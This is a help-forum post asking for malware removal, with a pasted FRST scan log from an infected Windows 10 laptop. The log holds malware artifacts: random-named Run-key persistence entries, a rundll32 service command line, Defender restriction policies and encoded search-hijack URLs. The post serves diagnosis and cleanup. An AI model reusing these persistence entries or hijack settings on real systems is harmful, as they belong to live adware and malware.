-
February 8th, 2019, 01:14 PM
#1
[RESOLVED] IE keeps popping and fake folders on drive C:\
Hello masters!
I've run a free Total AV quick and full scan and resolves at least 30 threats. But open restart, there are fake folders popping on C:\ and IE keeps popping crazy. Please help to clean my laptop. Here are the logs:
FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 6.02.2019
Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (09-02-2019 00:59:59)
Running from C:\Users\Thomazing!\Downloads
Loaded Profiles: Thomazing! (Available Profiles: Thomazing!)
Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() C:\ProgramData\Logic Cramble\set.exe
(Google Inc.) C:\ProgramData\localNETService\localNETService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(J4K6ZYTM) C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
() C:\Program Files (x86)\Multitimer\Multitimer.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(J4K6ZYTM) C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe
( ) C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe
() C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
(TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [Multitimer] => C:\Program Files (x86)\Multitimer\Multitimer.exe [281600 2017-12-12] () <==== ATTENTION
HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskWMpower\DiskPower.exe"
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1708016 2019-02-06] (Google LLC -> Google Inc.)
HKLM\...\RunOnce: [OMEWPRODUCT_7FCEM] => C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe [236032 2019-02-08] (J4K6ZYTM) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8222286] => "C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr\iastcgr31fm.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [WK27HXJEIFMX6EE] => "C:\Program Files\200OTU5ILR\200OTU5IL.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8735117] => "C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm\ncu5cze5p50.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [T9KTUNJFV82076N] => "C:\Program Files\1TH7OLWWNG\1TH7OLWWN.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CloudNet] => C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-08] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9428290] => "C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy\ubd1dkxuekl.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [U943W0QT19CB97H] => "C:\Program Files\J7CMVSXGZX\J7CMVSXGZ.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [3525589] => "C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4\bqedsdhpytd.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [URD8WCW2ZCRHWKK] => "C:\Program Files\RQIX2K7UEC\RQIX2K7UE.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [NNHJYS7S607ZBCR] => "C:\Program Files\0JJM5TTRFB\IBKXK5Q0P.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9236653] => "C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce\zrxkioireze.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8581968] => "C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2\lihriqawtkv.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [44K3AH7DLU628F4] => "C:\Program Files\E1WSWX87LG\BIX8CZGTD.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [H82B1SB6W40C6YU] => C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe [850944 2019-02-09] (J4K6ZYTM)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [5608956] => C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe [1277549 2019-02-09] ( )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.43.1
Internet Explorer:
==================
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-bFEwE5S0xnXgWxUsARdsrsiNM_BcRR6VIUgHwYSXwHh7Ffv8ygm0uKm7dXNxCM7Ay7BGUULgFL93oS9c_xJL13HFJx
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
FireFox:
========
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
Chrome:
=======
CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Bazz Search
CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-09]
CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
CHR Extension: (Flower Power) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
CHR Extension: (Bazz Search) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-02-07] () [File not signed] <==== ATTENTION
R2 localNETService; C:\ProgramData\localNETService\localNETService.exe [1905784 2019-02-08] (CONVERSION MAGIC LTD -> Google Inc.)
R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [4429264 2018-12-06] (Protected Antivirus Limited -> TotalAV)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
R2 NWQxNTAzNz; rundll32.exe C:\Windows\bxetfbicyncsflqei.bxetf IQQV [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 B62CD2D3FFB1; C:\Windows\B62CD2D3FFB1.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)
S3 bcmfn2; C:\Windows\System32\drivers\bcmfn2.sys [17624 2015-06-18] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
S0 nvraid; C:\Windows\System32\drivers\nvraid.sys [150368 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
S0 nvstor; C:\Windows\System32\drivers\nvstor.sys [166240 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
S0 SiSRaid2; C:\Windows\System32\drivers\SiSRaid2.sys [44896 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems Corp.)
S0 SiSRaid4; C:\Windows\System32\drivers\sisraid4.sys [81760 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-08] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-02-09 13:22 - 2019-02-09 00:52 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
2019-02-09 00:59 - 2019-02-09 01:01 - 000020986 _____ C:\Users\Thomazing!\Downloads\FRST.txt
2019-02-09 00:59 - 2019-02-09 00:59 - 000000000 ____D C:\FRST
2019-02-09 00:58 - 2019-02-09 00:59 - 002433536 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
2019-02-09 00:43 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files\OTIZAMD5IS
2019-02-09 00:43 - 2019-02-09 00:43 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
2019-02-09 00:43 - 2019-02-09 00:43 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
2019-02-08 23:11 - 2019-02-08 23:11 - 000000000 ____D C:\Users\Thomazing!\Documents\TotalAV
2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
2019-02-08 23:09 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files (x86)\TotalAV
2019-02-08 23:09 - 2019-02-08 23:09 - 000001089 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
2019-02-08 23:09 - 2019-02-08 23:09 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\TotalAV
2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
2019-02-08 23:02 - 2019-02-08 23:02 - 000003936 _____ C:\Windows\System32\Tasks\CCleaner Update
2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
